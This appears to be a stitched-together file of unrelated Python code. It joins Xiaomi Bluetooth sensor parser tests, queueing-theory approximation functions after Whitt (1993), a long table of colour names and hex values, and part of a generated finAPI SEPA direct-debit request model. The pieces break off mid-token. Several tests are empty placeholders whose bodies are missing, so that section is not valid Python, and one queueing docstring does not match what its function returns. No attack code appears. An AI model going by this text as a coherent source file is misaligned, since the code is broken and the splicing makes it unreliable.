    assert sensor_msg["rssi"] == -87
def test_Xiaomi_ZNMS16LM_lock(self):
    """Test Xiaomi parser for ZNMS16LM."""
    raw = bytes.fromhex(
        "043e2e02010000918aeb441fd722020106030295fe1a1695fe50449e0643918aeb441fd70b000920020001807c442f61a9"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V4)"
    assert sensor_msg["type"] == "ZNMS16LM"
    assert sensor_msg["mac"] == "D71F44EB8A91"
    assert sensor_msg["packet"] == 67
    assert sensor_msg["data"]
    assert sensor_msg["lock"] == 0
    assert sensor_msg["action"] == "unlock outside the door"
    assert sensor_msg["method"] == "biometrics"
    assert sensor_msg["error"] is None
    assert sensor_msg["key id"] == 2
    assert sensor_msg["rssi"] == -87
def test_Xiaomi_YLAI003(self):
"""Test Xiaomi parser for YLAI003."""
# TODO(review): placeholder - no assertions implemented yet.
def test_Xiaomi_YLYK01YL(self):
    """Test Xiaomi parser for YLYK01YL."""
    raw = bytes.fromhex(
        "043E21020103007450E94124F815141695FE503053013F7450E94124F8011003000000E0"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)"
    assert sensor_msg["type"] == "YLYK01YL"
    assert sensor_msg["mac"] == "F82441E95074"
    assert sensor_msg["packet"] == 63
    assert sensor_msg["data"]
    assert sensor_msg["remote"] == "on"
    assert sensor_msg["button"] == "single press"
    assert sensor_msg["remote single press"] == 1
    assert sensor_msg["rssi"] == -32
# TODO(review): the following parser tests are placeholders with no bodies.
def test_Xiaomi_YLYK01YL_FANCL(self):
"""Test Xiaomi parser for YLYK01YL-FANCL."""
def test_Xiaomi_YLYK01YL_VENFAN(self):
"""Test Xiaomi parser for YLYK01YL-VENFAN."""
def test_Xiaomi_YLYB01YL_BHFRC(self):
"""Test Xiaomi parser for YLYB01YL-BHFRC."""
def test_Xiaomi_YLKG07YL_press(self):
"""Test Xiaomi parser for YLKG07YL, YLKG08YL while pressing dimmer (no rotation)."""
data_string = "043E25020103008B98C54124F819181695FE5830B603D28B98C54124F8C3491476757E00000099DE"
data = bytes(bytearray.fromhex(data_string))
aeskey | |
float
average arrival rate to queueing system
svc_rate : float
average service rate (each server). 1/svc_rate is mean service time.
c : int
number of servers
ca2 : float
squared coefficient of variation for inter-arrival time distribution
cs2 : float
squared coefficient of variation for service time distribution
Returns
-------
float
variance of conditional wait time in queue
"""
varsojourn = ggm_sojourn_whitt_var(arr_rate, svc_rate, m, ca2, cs2)
meansojourn = ggm_mean_sojourn_whitt(arr_rate, svc_rate, m, ca2, cs2)
cv2 = varsojourn / meansojourn ** 2
return cv2
def ggm_mean_qsize_whitt(arr_rate, svc_rate, m, ca2, cs2):
    """
    Return the approximate mean queue size in GI/G/c/inf queue using Whitt's 1993 approximation and Little's Law.

    See Whitt, W. "Approximations for the GI/G/m queue"
    Production and Operations Management 2, 2 (Spring 1993): 114-161.
    It's based on interpolations with corrections between an M/D/c, D/M/c and a M/M/c queueing systems.

    Parameters
    ----------
    arr_rate : float
        average arrival rate to queueing system
    svc_rate : float
        average service rate (each server). 1/svc_rate is mean service time.
    m : int
        number of servers
    ca2 : float
        squared coefficient of variation for inter-arrival time distribution
    cs2 : float
        squared coefficient of variation for service time distribution

    Returns
    -------
    float
        mean number of customers waiting in queue
    """
    # Mean wait in queue per Eq 2.24 on p 125, then Lq = lambda * Wq.
    mean_wait = ggm_mean_qwait_whitt(arr_rate, svc_rate, m, ca2, cs2)
    return arr_rate * mean_wait
def ggm_mean_syssize_whitt(arr_rate, svc_rate, m, ca2, cs2):
    """
    Return the approximate mean system size in GI/G/c/inf queue using Whitt's 1993 approximation and Little's Law.

    See Whitt, W. "Approximations for the GI/G/m queue"
    Production and Operations Management 2, 2 (Spring 1993): 114-161.
    It's based on interpolations with corrections between an M/D/c, D/M/c and a M/M/c queueing systems.

    Parameters
    ----------
    arr_rate : float
        average arrival rate to queueing system
    svc_rate : float
        average service rate (each server). 1/svc_rate is mean service time.
    m : int
        number of servers
    ca2 : float
        squared coefficient of variation for inter-arrival time distribution
    cs2 : float
        squared coefficient of variation for service time distribution

    Returns
    -------
    float
        mean number of customers in the system
    """
    # Mean sojourn (wait + service) time, then L = lambda * W.
    sojourn = ggm_mean_sojourn_whitt(arr_rate, svc_rate, m, ca2, cs2)
    return arr_rate * sojourn
def dmm_mean_qwait_whitt(arr_rate, svc_rate, m, ca2=0.0, cs2=1.0):
    """
    Return the approximate mean wait in queue in a D/M/m/inf queue using Whitt's 1993 approximation.

    See Whitt, Ward. "Approximations for the GI/G/m queue"
    Production and Operations Management 2, 2 (Spring 1993): 114-161. Specifically, this approximation
    is Eq 2.20 on p124.
    This, along with mdm_mean_qwait_whitt, is a refinement of the Cosmetatos approximations.

    Parameters
    ----------
    arr_rate : float
        average arrival rate to queueing system
    svc_rate : float
        average service rate (each server). 1/svc_rate is mean service time.
    m : int
        number of servers
    ca2 : float
        squared coefficient of variation for inter-arrival time distribution (0 for D)
    cs2 : float
        squared coefficient of variation for service time distribution (1 for M)

    Returns
    -------
    float
        mean wait time in queue
    """
    rho = arr_rate / (svc_rate * float(m))
    # Eq 2.20 on p 124: phi_3 correction times the usual variability
    # factor applied to the exact M/M/m mean wait.
    phi3 = _ggm_mean_qwait_whitt_phi_3(m, rho)
    variability = 0.5 * (ca2 + cs2)
    return phi3 * variability * mmc_mean_qwait(arr_rate, svc_rate, m)
def mdm_mean_qwait_whitt(arr_rate, svc_rate, m, ca2=0.0, cs2=1.0):
    """
    Return the approximate mean wait in queue in an M/D/m/inf queue using Whitt's 1993 approximation.

    See Whitt, Ward. "Approximations for the GI/G/m queue"
    Production and Operations Management 2, 2 (Spring 1993): 114-161. Specifically, this approximation
    is Eq 2.16 on p124.
    This, along with dmm_mean_qwait_whitt, is a refinement of the Cosmetatos approximations.

    Parameters
    ----------
    arr_rate : float
        average arrival rate to queueing system
    svc_rate : float
        average service rate (each server). 1/svc_rate is mean service time.
    m : int
        number of servers
    ca2 : float
        squared coefficient of variation for inter-arrival time distribution (0 for D)
    cs2 : float
        squared coefficient of variation for service time distribution (1 for M)

    Returns
    -------
    float
        mean wait time in queue
    """
    rho = arr_rate / (svc_rate * float(m))
    # Eq 2.16 on p 124: phi_1 correction times the usual variability
    # factor applied to the exact M/M/m mean wait.
    phi1 = _ggm_mean_qwait_whitt_phi_1(m, rho)
    variability = 0.5 * (ca2 + cs2)
    return phi1 * variability * mmc_mean_qwait(arr_rate, svc_rate, m)
def fit_balanced_hyperexpon2(mean, cs2):
    """
    Return the branching probabilities and rates of a balanced two-phase
    hyperexponential (H2) distribution matching a given mean and scv.
    Intended for scv's > 1.

    See Whitt, Ward. "Approximations for the GI/G/m queue"
    Production and Operations Management 2, 2 (Spring 1993): 114-161.

    Parameters
    ----------
    mean : float
        desired mean of the fitted distribution
    cs2 : float
        squared coefficient of variation for desired distribution

    Returns
    -------
    tuple (float p, float rate1, float rate2)
        branching probability of the first phase and the two exponential rates
    """
    # "Balanced means" condition: p1/mu1 == p2/mu2.
    ratio = (cs2 - 1.0) / (cs2 + 1.0)
    p1 = 0.5 * (1.0 + np.sqrt(ratio))
    p2 = 1.0 - p1
    return (p1, 2.0 * p1 / mean, 2.0 * p2 / mean)
def hyperexpon_cdf(x, probs, rates):
    """
    Return P(X <= x) where X is hyperexponential with branching
    probabilities ``probs`` and exponential rates ``rates``.

    Parameters
    ----------
    x : float
        evaluation point
    probs : list of floats
        branching probabilities for hyperexponential
    rates : list of floats
        exponential rates

    Returns
    -------
    float
        P(X <= x) where X ~ hyperexponential(probs, rates)
    """
    # Survival function is the probability-weighted mix of exponential tails.
    tail = 0.0
    for p, r in zip(probs, rates):
        tail += p * np.exp(-r * x)
    return 1.0 - tail
def ggm_qcondwait_cdf_whitt(t, arr_rate, svc_rate, c, ca2, cs2):
    """
    Return the approximate P(D <= t) where D = (W|W>0) in a G/G/m queue using
    Whitt's two-moment approximation.

    See Section 4 of Whitt, Ward. "Approximations for the GI/G/m queue"
    Production and Operations Management 2, 2 (Spring 1993): 114-161.
    It's based on an approach he originally used for G/G/1 queues in QNA.
    A fitting distribution is chosen from the approximate scv of D:
    hyperexponential (scv > 1), exponential (scv ~ 1), convolution of two
    distinct exponentials (moderate scv), or Erlang-2 (low scv).

    Parameters
    ----------
    t : float
        wait time of interest
    arr_rate : float
        average arrival rate to queueing system
    svc_rate : float
        average service rate (each server). 1/svc_rate is mean service time.
    c : int
        number of servers
    ca2 : float
        squared coefficient of variation for inter-arrival time distribution
    cs2 : float
        squared coefficient of variation for service time distribution

    Returns
    -------
    float
        ~ P(D <= t)
    """
    rho = arr_rate / (svc_rate * float(c))
    # E[D] = E[Wq] / P(W > 0).
    ed = (ggm_mean_qwait_whitt(arr_rate, svc_rate, c, ca2, cs2)
          / ggm_prob_wait_whitt(arr_rate, svc_rate, c, ca2, cs2))
    cd2 = ggm_qcondwait_whitt_cd2(rho, cs2)
    if cd2 > 1.01:
        # Balanced H2 fit to (E[D], scv).
        p1, gamma1, gamma2 = fit_balanced_hyperexpon2(ed, cd2)
        return hyperexpon_cdf(t, [p1, 1.0 - p1], [gamma1, gamma2])
    if 0.99 <= cd2 <= 1.01:
        # Close enough to scv == 1: plain exponential.
        return stats.expon.cdf(t, scale=ed)
    if 0.501 <= cd2 < 0.99:
        # Convolution of two exponentials with distinct rates fitted to
        # the first two moments of D.
        vard = ggm_qcondwait_whitt_vard(arr_rate, svc_rate, c, ca2, cs2)
        gamma2 = 2.0 / (ed + np.sqrt(2 * vard - ed ** 2))
        gamma1 = 1.0 / (ed - 1.0 / gamma2)
        tail = (gamma1 * np.exp(-gamma2 * t) - gamma2 * np.exp(-gamma1 * t)) / (gamma1 - gamma2)
        return 1.0 - tail
    # Low scv: Erlang-2 with matching mean.
    rate = 2.0 / ed
    return 1.0 - np.exp(-rate * t) * (1.0 + rate * t)
def ggm_qwait_cdf_whitt(t, arr_rate, svc_rate, c, ca2, cs2):
    """Approximate P(W <= t) in a G/G/m queue.

    Combines Whitt's two-moment approximation for the conditional wait
    (see ggm_qcondwait_cdf_whitt) with the delay probability P(W > 0).
    See Section 4 of Whitt, Ward. "Approximations for the GI/G/m queue"
    Production and Operations Management 2, 2 (Spring 1993): 114-161.

    Parameters
    ----------
    t : float
        wait time of interest
    arr_rate : float
        average arrival rate to queueing system
    svc_rate : float
        average service rate (each server). 1/svc_rate is mean service time.
    c : int
        number of servers
    ca2 : float
        squared coefficient of variation for interarrival time distribution
    cs2 : float
        squared coefficient of variation for service time distribution

    Returns
    -------
    float
        ~ P(W <= t)
    """
    p_delay = ggm_prob_wait_whitt(arr_rate, svc_rate, c, ca2, cs2)
    p_cond_lt_t = ggm_qcondwait_cdf_whitt(t, arr_rate, svc_rate, c, ca2, cs2)
    # Condition on whether the customer waits at all:
    # P(W <= t) = P(W = 0) + P(W > 0) * P(W <= t | W > 0).
    return (1.0 - p_delay) + p_delay * p_cond_lt_t
def ggm_qwait_pctile_whitt(p, arr_rate, svc_rate, c, ca2, | |
"Big Sky": 0xCDE2DE,
"Big Spender": 0xACDDAF,
"Big Stone": 0x334046,
"Big Stone Beach": 0x886E54,
"Big Sur": 0xB3CADC,
"Big Sur Blue Jade": 0x3F6E8E,
"Big Surf": 0x96D0D1,
"Big Yellow Streak": 0xFFEE22,
"Big Yellow Taxi": 0xFFFF33,
"Bigfoot": 0x715145,
"Bighorn Sheep": 0x20120E,
"Bijou Blue": 0x4E5E7F,
"Bijou Red": 0xA33D3B,
"Bijoux Green": 0x676B55,
"Biking Red": 0x77212E,
"Biking Trail": 0xC3C0B1,
"Bilbao": 0x3E8027,
"Bilberry": 0x71777E,
"Bile": 0xB5C306,
"Bilious Brown": 0xE39F08,
"Bilious Green": 0xA9D171,
"Billabong": 0x1B6F81,
"Billet": 0xAD7C35,
"Billiard": 0x00AA92,
"Billiard Ball": 0x276B40,
"Billiard Green": 0x305A4A,
"Billiard Room": 0x50846E,
"Billiard Table": 0x155843,
"Billowing Clouds": 0xD8DEE3,
"Billowing Sail": 0xD8E7E7,
"Billowing Smoke": 0x6E726A,
"Billowy Breeze": 0xAFC7CD,
"Billowy Clouds": 0xF6F0E9,
"Billowy Down": 0xEFF0E9,
"Billycart Blue": 0x4C77A4,
"Biloba Flower": 0xAE99D2,
"Biloxi": 0xF4E4CD,
"Biloxi Blue": 0x0075B8,
"Biltmore Buff": 0xE3C9A1,
"Biltong": 0x410200,
"Bimini Blue": 0x007A91,
"Binary Star": 0x616767,
"Bindi Dot": 0x8B3439,
"Bindi Red": 0xB0003C,
"Bing Cherry Pie": 0xAF4967,
"Binrouji Black": 0x433D3C,
"Bio Blue": 0x465F9E,
"Biogenic Sand": 0xFFEFD5,
"Biohazard Suit": 0xFBFB4C,
"Biology Experiments": 0x91A135,
"Bioluminescence": 0x55EEFF,
"BioShock": 0x889900,
"Biotic Grasp": 0xEEEE44,
"Biotic Orb": 0xEEDD55,
"Birch": 0x3F3726,
"Birch Beige": 0xD9C3A1,
"Birch Forest": 0x899A8B,
"Birch Leaf Green": 0x637E1D,
"Birch Strain": 0xDFB45F,
"Birch White": 0xF6EEDF,
"Birchwood": 0xCCBEAC,
"Birchy Woods": 0x806843,
"Bird Blue": 0x7B929E,
"Bird Blue Grey": 0x7F92A0,
"Bird Flower": 0xD0C117,
"Bird Of Paradise": 0x0083A8,
"Bird's Child": 0xFFF1CF,
"Bird's Egg Green": 0xAACCB9,
"Bird's Nest": 0xCFBB9B,
"Bird’s Eye": 0xB9030A,
"Birdhouse Brown": 0x6C483A,
"Birdie": 0xE9E424,
"Birdie Num Num": 0x89ACDA,
"Birdseed": 0xE2C28E,
"Birdseye Maple": 0xE4C495,
"Biro Blue": 0x2F3946,
"Birōdo Green": 0x224634,
"Birth of a Star": 0xFCE9DF,
"Birthday Cake": 0xE9D2CC,
"Birthday Candle": 0xCFA2AD,
"Birthday King": 0x9BDCB9,
"Birthday Suit": 0xE2C7B6,
"Birthstone": 0x79547A,
"Biscay": 0x2F3C53,
"Biscay Bay": 0x097988,
"Biscay Green": 0x55C6A9,
"Biscotti": 0xDAC7AB,
"Biscuit": 0xFEEDCA,
"Biscuit Beige": 0xE6BFA6,
"Biscuit Cream": 0xF9CCB7,
"Biscuit Dough": 0xE8DBBD,
"Bishop Red": 0xC473A9,
"Bismarck": 0x486C7A,
"Bison": 0x6E4F3A,
"Bison Beige": 0x9F9180,
"Bison Brown": 0x584941,
"Bison Hide": 0xB5AC94,
"Bisque": 0xFFE4C4,
"Bisque Tan": 0xE5D2B0,
"Bistre": 0x3D2B1F,
"Bistre Brown": 0x967117,
"Bistro": 0x705950,
"Bistro Green": 0x395551,
"Bit of Berry": 0xDD5599,
"Bit of Blue": 0xE2EAEB,
"Bit of Heaven": 0xCAD7DE,
"Bit of Lime": 0xE1E5AC,
"Bit of Sugar": 0xF4F2EC,
"Bitcoin": 0xFFBB11,
"Bite the Bullet": 0xECEBCE,
"Bitter": 0x88896C,
"Bitter Briar": 0x8D7470,
"Bitter Chocolate": 0x9E5B40,
"Bitter Clover Green": 0x769789,
"Bitter Dandelion": 0x6ECB3C,
"Bitter Lemon": 0xD2DB32,
"Bitter Lime": 0xCFFF00,
"Bitter Melon": 0xCFD1B2,
"Bitter Orange": 0xD5762B,
"Bitter Sage": 0x97A18D,
"Bitter Violet": 0x856D9E,
"Bittersweet": 0xFEA051,
"Bittersweet Shimmer": 0xBF4F51,
"Bittersweet Stem": 0xCBB49A,
"Bizarre": 0xE7D2C8,
"Black": 0x000000,
"Black Bamboo": 0x5B5D53,
"Black Bay": 0x474A4E,
"Black Bean": 0x4E4B4A,
"Black Beauty": 0x26262A,
"Black Blueberry": 0x2F2F48,
"Black Boudoir": 0x454749,
"Black Cat": 0x2E2F31,
"Black Chestnut Oak": 0x252321,
"Black Chocolate": 0x441100,
"Black Coffee": 0x3B302F,
"Black Coral": 0x54626F,
"Black Dahlia": 0x4E434D,
"Black Diamond Apple": 0x8A779A,
"Black Dragon's Cauldron": 0x545562,
"Black Drop": 0x90ABD9,
"Black Elder": 0xA66E7A,
"Black Elegance": 0x50484A,
"Black Emerald": 0x12221D,
"Black Evergreen": 0x45524F,
"Black Feather": 0x112222,
"Black Flame": 0x484B5A,
"Black Forest": 0x5E6354,
"Black Forest Blue": 0x29485A,
"Black Forest Green": 0x424740,
"Black Fox": 0x4F4842,
"Black Garnet": 0x4E4444,
"Black Glaze": 0x001111,
"Black Green": 0x384E49,
"Black Grey": 0x24272E,
"Black Haze": 0xE0DED7,
"Black Headed Gull": 0x9C856C,
"Black Hills Gold": 0xC89180,
"Black Hole": 0x010203,
"Black Htun": 0x110033,
"Black Ice": 0x4D5051,
"Black Ink": 0x44413C,
"Black Iris": 0x2B3042,
"Black Is Beautiful": 0x552222,
"Black Jasmine Rice": 0x74563D,
"Black Kite": 0x351E1C,
"Black Knight": 0x010B13,
"Black Lacquer": 0x3F3E3E,
"Black Lead": 0x474C4D,
"Black Leather Jacket": 0x253529,
"Black Licorice": 0x3A3B3B,
"Black Locust": 0x646763,
"Black Magic": 0x4F4554,
"Black Mana": 0x858585,
"Black Market": 0x222244,
"Black Marlin": 0x383740,
"Black Mesa": 0x222211,
"Black Metal": 0x060606,
"Black Mocha": 0x4B4743,
"Black Oak": 0x4E4F4E,
"Black of Night": 0x323639,
"Black Olive": 0x3B3C36,
"Black Onyx": 0x2B272B,
"Black Orchid": 0x525463,
"Black Out": 0x222222,
"Black Panther": 0x424242,
"Black Pearl": 0x1E272C,
"Black Pine Green": 0x33654A,
"Black Plum": 0x6C5765,
"Black Pool": 0x4F5552,
"Black Powder": 0x34342C,
"Black Power": 0x654B37,
"Black Pudding": 0xA44A56,
"Black Queen": 0x694D27,
"Black Raspberry": 0x16110D,
"Black Ribbon": 0x484C51,
"Black River Falls": 0x343E54,
"Black Rock": 0x2C2D3C,
"Black Rooster": 0x331111,
"Black Rose": 0x532934,
"Black Russian": 0x24252B,
"Black Sabbath": 0x220022,
"Black Sable": 0x434B4D,
"Black Safflower": 0x302833,
"Black Sand": 0x5B4E4B,
"Black Sapphire": 0x434555,
"Black Shadows": 0xBFAFB2,
"Black Sheep": 0x0F0D0D,
"Black Slug": 0x332211,
"Black Smoke": 0x3E3E3F,
"Black Soap": 0x19443C,
"Black Space": 0x545354,
"Black Spruce": 0x4C5752,
"Black Squeeze": 0xE5E6DF,
"Black Suede": 0x434342,
"Black Swan": 0x332200,
"Black Tie": 0x464647,
"Black Tortoise": 0x353235,
"Black Truffle": 0x463D3E,
"Black Velvet": 0x222233,
"Black Violet": 0x2B2C42,
"Black Walnut": 0x5E4F46,
"Black Wash": 0x0C0C0C,
"Black Water": 0x2E4846,
"Black White": 0xE5E4DB,
"Blackadder": 0x292C2C,
"Blackberry": 0x43182F,
"Blackberry Black": 0x2E2848,
"Blackberry Burgundy": 0x4C3938,
"Blackberry Cobbler": 0x404D6A,
"Blackberry Cordial": 0x3F2A47,
"Blackberry Cream": 0xD9D3DA,
"Blackberry Deep Red": 0x633654,
"Blackberry Farm": 0x62506B,
"Blackberry Harvest": 0x504358,
"Blackberry Jam": 0x87657E,
"Blackberry Leaf Green": 0x507F6D,
"Blackberry Mocha": 0xA58885,
"Blackberry Pie": 0x64242E,
"Blackberry Sorbet": 0xC1A3B9,
"Blackberry Tint": 0x8F5973,
"Blackberry Wine": 0x4D3246,
"Blackberry Yogurt": 0xE5BDDF,
"Blackbird": 0x3F444C,
"Blackbird's Ggg": 0xFCE7E4,
"Blackboard Green": 0x274C43,
"Blackcurrant": 0x2E183B,
"Blackcurrant Conserve": 0x52383D,
"Blackcurrant Elixir": 0x5C4F6A,
"Blackened Brown": 0x442200,
"Blackened Pearl": 0x4D4B50,
"Blackest Berry": 0x662266,
"Blackest Brown": 0x403330,
"Blackfire Earth": 0x7A5901,
"Blackheath": 0x49454B,
"Blackish Brown": 0x453B32,
"Blackish Green": 0x5D6161,
"Blackish Grey": 0x5B5C61,
"Blackjack": 0x51504D,
"Blacklist": 0x221133,
"Blackmail": 0x220066,
"Blackout": 0x0E0702,
"Blackthorn Berry": 0x8470FF,
"Blackthorn Blue": 0x4C606B,
"Blackthorn Green": 0x739C69,
"Blackwater": 0x545663,
"Blackwater Park": 0x696268,
"Blade Green": 0x6A9266,
"Bladed Grass": 0x758269,
"Bladerunner": 0x6A8561,
"Blair": 0xA1BDE0,
"Blanc": 0xD9D0C2,
"Blanc Cassé": 0xF1EEE2,
"Blanc De Blanc": 0xE7E9E7,
"Blanca Peak": 0xF8F9F4,
"Blanched Almond": 0xFFEBCD,
"Blanched Driftwood": 0xCCBEB6,
"Bland": 0xAFA88B,
"Blank Canvas": 0xFFEFD6,
"Blanka Green": 0x9CD33C,
"Blanket Brown": 0x9E8574,
"Blarney": 0x00A776,
"Blarney Stone": 0x027944,
"Blast-Off Bronze": 0xA57164,
"Blasted Lands Rocks": 0x6C3550,
"Blaze": 0xFA8C4F,
"Blaze Orange": 0xFE6700,
"Blazing Autumn": 0xF3AD63,
"Blazing Bonfire": 0xFFA035,
"Blazing Orange": 0xFFA64F,
"Blazing Yellow": 0xFEE715,
"Bleach White": 0xEBE1CE,
"Bleached Almond": 0xF3EAD5,
"Bleached Apricot": 0xFCCAAC,
"Bleached Aqua": 0xBCE3DF,
"Bleached Bare": 0xD0C7C3,
"Bleached Bark": 0x8B7F78,
"Bleached Bone": 0xEFD9A8,
"Bleached Cedar": 0x2C2133,
"Bleached Coral": 0xFFD6D1,
"Bleached Denim": 0x646F9B,
"Bleached Grey": 0x788878,
"Bleached Jade": 0xE2E6D1,
"Bleached Linen": 0xF3ECE1,
"Bleached Maple": 0xC7A06C,
"Bleached Meadow": 0xEAE5D5,
"Bleached Sand": 0xDACCB4,
"Bleached Shell": 0xF6E5DA,
"Bleached Silk": 0xF3F3F2,
"Bleached Spruce": 0xBAD7AE,
"Bleached Wheat": 0xDDD2A9,
"Bleached White": 0xDFE3E8,
"Bleaches": 0xC7C7C3,
"Bleeding Heart": 0xC02E4C,
"Blende Blue": 0xA9C4C4,
"Blended Fruit": 0xF8E3A4,
"Blended Light": 0xFFFBE8,
"Blessed Blue": 0x4499CC,
"Bleu Ciel": 0x007BA1,
"Bleu De France": 0x318CE7,
"Bleu Nattier": 0x9CC2BF,
"Bleuchâtel Blue": 0x4488FF,
"Blind Date": 0xBCAEA1,
"Blind Forest": 0x223300,
"Bling Bling": 0xEEF0CE,
"Blinking Blue": 0x0033FF,
"Blinking Terminal": 0x66CC00,
"Bliss Blue": 0x7AC7E1,
"Blissful": 0xDDC4D4,
"Blissful Berry": 0xAA1188,
"Blissful Blue": 0xB2C8D8,
"Blissful Light": 0xE5D2DD,
"Blissful Meditation": 0xD5DAEE,
"Blissful Orange": 0xFFAC39,
"Blissful Serenity": 0xEAEED8,
"Blissfully Mine": 0xDAB6CD,
"Blister Pearl": 0xAAFFEE,
"Blithe": 0x0084BD,
"Blithe Blue": 0x90BDBD,
"Blizzard": 0xE5EBED,
"Blizzard Blue": 0xA3E3ED,
"Blobfish": 0xFFC1CC,
"Blockchain Gold": 0xE8BC50,
"Bloedworst": 0x560319,
"Blond": 0xFAF0BE,
"Blonde": 0xDCBD92,
"Blonde Beauty": 0xF2EFCD,
"Blonde Curl": 0xEFE2C5,
"Blonde Girl": 0xEDC558,
"Blonde Lace": 0xD6B194,
"Blonde Shell": 0xF6EDCD,
"Blonde Wood": 0xAB7741,
"Blonde Wool": 0xE5D0B1,
"Blood": 0x770001,
"Blood Brother": 0x770011,
"Blood Burst": 0xFF474C,
"Blood Donor": 0xEA1822,
"Blood God": 0x67080B,
"Blood Mahogany": 0x543839,
"Blood Moon": 0xD83432,
"Blood Omen": 0x8A0303,
"Blood Orange": 0xD1001C,
"Blood Orange Juice": 0xFE4B03,
"Blood Organ": 0x630F0F,
"Blood Pact": 0x771111,
"Blood Red": 0x980002,
"Blood Rose": 0x73404D,
"Blood Rush": 0xAA2222,
"Blood Thorn": 0xB03060,
"Bloodhound": 0xBB5511,
"Bloodletter": 0xE97451,
"Bloodline": 0x882200,
"Bloodmyst Isle": 0xF02723,
"Bloodstain": 0x772200,
"Bloodstone": 0x413431,
"Bloodthirsty": 0x880011,
"Bloodthirsty Beige": 0xF8D7D0,
"Bloodthirsty Vampire": 0x9B0503,
"Bloodthirsty Warlock": 0xEC1837,
"Bloodtracker Brown": 0x703F00,
"Bloody Periphylla": 0xAA1144,
"Bloody Pico-8": 0xFF004D,
"Bloody Red": 0xCA1F1B,
"Bloody Rust": 0xDA2C43,
"Bloody Salmon": 0xCC4433,
"Bloom": 0xFFAF75,
"Blooming Aster": 0xD7E2EE,
"Blooming Dahlia": 0xEB9687,
"Blooming Lilac": 0xBA93AF,
"Blooming Perfect": 0xD89696,
"Blooming Wisteria": 0x88777E,
"Bloomsberry": 0xA598C4,
"Blossom": 0xFEE9D8,
"Blossom Blue": 0xAACCEE,
"Blossom Mauve": 0xA3A7CC,
"Blossom Pink": 0xE6D5CE,
"Blossom Powder": 0xC3B3B9,
"Blossom Time": 0xE5D2C9,
"Blossom White": 0xF2EEE4,
"Blossom Yellow": 0xE1C77D,
"Blossoms in Spring": 0xE79ACB,
"Blouson Blue": 0x67B7C6,
"Blowing Kisses": 0xF6DEE0,
"Blowout": 0x658499,
"Blue": 0x0000FF,
"Blue Accolade": 0x25415D,
"Blue Agave": 0xB1C6C7,
"Blue Alps": 0x89A3AE,
"Blue Android Base": 0x5A79BA,
"Blue Angel": 0x0022DD,
"Blue Angels Yellow": 0xF8B800,
"Blue Angora": 0xA7CFCB,
"Blue Antarctic": 0x4B789B,
"Blue Anthracite": 0x555E64,
"Blue Arc": 0x0085A1,
"Blue Ash": 0x414654,
"Blue Ashes": 0x3B5F78,
"Blue Aster": 0x0077B3,
"Blue Astro": 0x50A7D9,
"Blue Atoll": 0x00B1D2,
"Blue Aura": 0x6C7386,
"Blue Azure": 0x4682BF,
"Blue Ballad": 0x7498BD,
"Blue Ballerina": 0xB4C7DB,
"Blue Ballet": 0x576B6B,
"Blue Bauble": 0xABDEE3,
"Blue Bay": 0x619AD6,
"Blue Bayberry": 0x2D5360,
"Blue Bayou": 0xBEC4D3,
"Blue Beads": 0x5A809E,
"Blue Beauty": 0x7498BF,
"Blue Beetle": 0x220099,
"Blue Bell": 0x93B4D7,
"Blue Beret": 0x40638E,
"Blue | |
# coding: utf-8
"""
finAPI RESTful Services
finAPI RESTful Services # noqa: E501
OpenAPI spec version: v1.42.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.single_direct_debit_data import SingleDirectDebitData # noqa: F401,E501
class RequestSepaDirectDebitParams(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'account_id': 'int',
'banking_pin': 'str',
'two_step_procedure_id': 'str',
'direct_debit_type': 'str',
'sequence_type': 'str',
'execution_date': 'str',
'direct_debits': 'list[SingleDirectDebitData]'
}
attribute_map = {
'account_id': 'accountId',
'banking_pin': 'bankingPin',
'two_step_procedure_id': 'twoStepProcedureId',
'direct_debit_type': 'directDebitType',
'sequence_type': 'sequenceType',
'execution_date': 'executionDate',
'direct_debits': 'directDebits'
}
def __init__(self, account_id=None, banking_pin=None, two_step_procedure_id=None, direct_debit_type=None, sequence_type=None, execution_date=None, direct_debits=None):  # noqa: E501
    """RequestSepaDirectDebitParams - a model defined in Swagger

    account_id, direct_debit_type, sequence_type, execution_date and
    direct_debits are assigned unconditionally through their property
    setters, whose validation raises ValueError when a required value
    is None.  banking_pin and two_step_procedure_id are optional and
    only assigned when a value is supplied.
    """
    # Private backing fields read/written by the properties below.
    self._account_id = None
    self._banking_pin = None
    self._two_step_procedure_id = None
    self._direct_debit_type = None
    self._sequence_type = None
    self._execution_date = None
    self._direct_debits = None
    self.discriminator = None
    # Assign via the property setters so their validation runs.
    self.account_id = account_id
    if banking_pin is not None:
        self.banking_pin = banking_pin
    if two_step_procedure_id is not None:
        self.two_step_procedure_id = two_step_procedure_id
    self.direct_debit_type = direct_debit_type
    self.sequence_type = sequence_type
    self.execution_date = execution_date
    self.direct_debits = direct_debits
@property
def account_id(self):
    """Gets the account_id of this RequestSepaDirectDebitParams.  # noqa: E501

    Identifier of the bank account to which you want to transfer the money.  # noqa: E501

    :return: The account_id of this RequestSepaDirectDebitParams.  # noqa: E501
    :rtype: int
    """
    return self._account_id

@account_id.setter
def account_id(self, account_id):
    """Sets the account_id of this RequestSepaDirectDebitParams.

    Identifier of the bank account to which you want to transfer the money.  # noqa: E501

    :param account_id: The account_id of this RequestSepaDirectDebitParams.  # noqa: E501
    :type: int
    """
    # account_id is a required field: reject None explicitly.
    if account_id is None:
        raise ValueError("Invalid value for `account_id`, must not be `None`")  # noqa: E501
    self._account_id = account_id
@property
def banking_pin(self):
    """Gets the banking_pin of this RequestSepaDirectDebitParams.  # noqa: E501

    Online banking PIN. If a PIN is stored in the account's bank connection, then this field may remain unset. If the field is set though then it will always be used (even if there is some other PIN stored in the bank connection).  # noqa: E501

    :return: The banking_pin of this RequestSepaDirectDebitParams.  # noqa: E501
    :rtype: str
    """
    return self._banking_pin

@banking_pin.setter
def banking_pin(self, banking_pin):
    """Sets the banking_pin of this RequestSepaDirectDebitParams.

    Online banking PIN. If a PIN is stored in the account's bank connection, then this field may remain unset. If the field is set though then it will always be used (even if there is some other PIN stored in the bank connection).  # noqa: E501

